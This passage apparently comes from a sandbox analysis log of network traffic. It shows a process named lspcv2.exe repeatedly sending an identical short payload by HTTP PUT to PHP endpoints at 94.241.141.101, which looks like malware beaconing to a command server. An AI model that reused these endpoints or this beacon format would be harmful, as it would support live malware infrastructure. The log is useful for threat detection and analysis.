Content-Length: 25
Nov 14, 2024 15:01:18.466043949 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:19.330444098 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 81 | Source IP: 192.168.2.4 | Source Port: 50059 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 3220 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:18.507278919 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:18.512321949 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:19.436356068 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 82 | Source IP: 192.168.2.4 | Source Port: 50066 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 7912 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:19.120625019 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:19.125715971 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:20.016576052 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:19 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID: 83 | Source IP: 192.168.2.4 | Source Port: 50067 | Destination IP: 94.241.141.101 | Destination Port: 80 | PID: 4020 | Process: C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:19.454828024 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:19.460321903 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:20.336534023 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:20 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port
84 | 192.168.2.4 | 50069 | 94.241.141.101 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:19.565710068 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:19.570830107 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:20.447848082 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:20 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
85 | 192.168.2.4 | 50074 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:20.136226892 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:20.141629934 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:21.052283049 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:20 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
86 | 192.168.2.4 | 50076 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:20.466398001 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:20.472464085 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:21.365436077 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:21 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.4 | 50078 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:20.588063002 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:20.596529007 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:21.469060898 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:21 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.4 | 50082 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:21.167289019 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:21.173734903 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:22.051029921 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:21 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.4 | 50085 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:21.485507011 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:21.490469933 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:22.361598969 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:22 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.4 | 50087 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:21.600435019 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:21.605362892 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:22.469089985 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:22 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.4 | 50090 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:22.167197943 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:22.172390938 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:23.048171997 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:22 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.4 | 50093 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:22.484222889 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:22.489232063 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:23.368228912 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:23 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
93 | 192.168.2.4 | 50096 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:22.597182989 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:22.602072954 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:23.487541914 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:23 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
94 | 192.168.2.4 | 50099 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:23.167635918 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:23.172528982 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:24.046369076 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:23 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
95 | 192.168.2.4 | 50103 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:23.484448910 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:23.489361048 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:24.360596895 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:24 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
96 | 192.168.2.4 | 50104 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:23.610367060 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:23.615186930 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:24.481467009 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:24 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
97 | 192.168.2.4 | 50108 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:24.168046951 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:24.173306942 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:25.062972069 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:24 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
98 | 192.168.2.4 | 50110 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:24.484895945 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:24.490391970 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:25.363231897 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
99 | 192.168.2.4 | 50112 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:24.599447966 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:24.604752064 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:25.497446060 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
100 | 192.168.2.4 | 50116 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:25.185024023 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:25.189925909 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:26.083884001 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
101 | 192.168.2.4 | 50119 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:25.485979080 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:25.491101980 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:26.451997995 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:26 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
102 | 192.168.2.4 | 50120 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:25.627593994 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:25.632509947 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:26.505048990 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:26 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
103 | 192.168.2.4 | 50125 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:26.203217983 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:26.209075928 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:27.087095976 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:26 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
104 | 192.168.2.4 | 50128 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:26.581463099 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:26.586308956 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:27.469418049 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:27 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
105 | 192.168.2.4 | 50130 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:26.630498886 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:26.635756016 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:27.531162977 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:27 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
106 | 192.168.2.4 | 50133 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:27.201344967 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:27.206454992 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:28.097647905 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:27 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
107 | 192.168.2.4 | 50138 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:27.596833944 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Content-Type: multipart/form-data
User-Agent: Mozilla/4.0
Host: 94.241.141.101
Content-Length: 25
Nov 14, 2024 15:01:27.601768017 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:28.476037025 CET | 166 | IN | HTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 14:01:28 GMT
Server: Apache/2.4.29 (Ubuntu)
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
108 | 192.168.2.4 | 50139 | 94.241.141.101 | 80 | 3220 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:27.657650948 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:27.662507057 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:28.580079079 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:28 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
109 | 192.168.2.4 | 50141 | 94.241.141.101 | 80 | 7912 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:28.214709997 CET | 199 | OUT | PUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
Nov 14, 2024 15:01:28.220026970 CET | 25 | OUT | Data Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
Data Ascii: 8552719EAD809EN0V07
Nov 14, 2024 15:01:29.104486942 CET | 166 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:28 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
110 | 192.168.2.4 | 50146 | 94.241.141.101 | 80 | 4020 | C:\Intrumental\lspcv2.exe
Timestamp | Bytes transferred | Direction | Data
Nov 14, 2024 15:01:28.598071098 CET | 199 | OUT | PUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
